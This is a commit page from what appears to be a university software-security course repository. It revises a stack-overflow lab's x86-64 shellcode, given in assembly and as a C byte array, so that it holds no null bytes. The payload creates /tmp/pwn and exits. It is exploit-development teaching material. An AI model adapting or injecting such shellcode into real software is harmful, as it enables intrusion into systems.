ephase/cours
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity

Avoid forgotten \0

Browse source 
using lea, neg
This commit is contained in:
Yorick Barbanneau 2023-03-30 10:19:50 +02:00
parent 15695498a4
commit 70c0823fe7
2 changed files with 7 additions and 6 deletions
Download patch file Download diff file Expand all files Collapse all files

2
content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
View file

@ -2,7 +2,7 @@
#include <stdio.h> #include <stdio.h>
unsigned char exploit[1024] = { unsigned char exploit[1024] = {
0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00 0xeb,0x2b,0x48,0x31,0xff,0x5f,0x68,0x4b,0xfe,0xff,0xff,0x48,0x31,0xf6,0x5e,0x48,0xf7,0xde,0x48,0x83,0xc6,0x01,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd0,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e
}; };
int main(void) { int main(void) {

9
content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
View file

@ -5,12 +5,13 @@ _start:
jmp indirect jmp indirect
p: p:
xorq %rdi, %rdi xor %rdi, %rdi
pop %rdi pop %rdi
#shr $0x8, %rdi push $0xfffffffffffffe4b
push $0x1b6
xor %rsi, %rsi xor %rsi, %rsi
pop %rsi pop %rsi
neg %rsi
add $1, %rsi
push $85 push $85
pop %rax pop %rax
syscall syscall
@ -26,4 +27,4 @@ p:
indirect: indirect:
call p call p
.asciz "/tmp/pwn" .ascii "/tmp/pwn"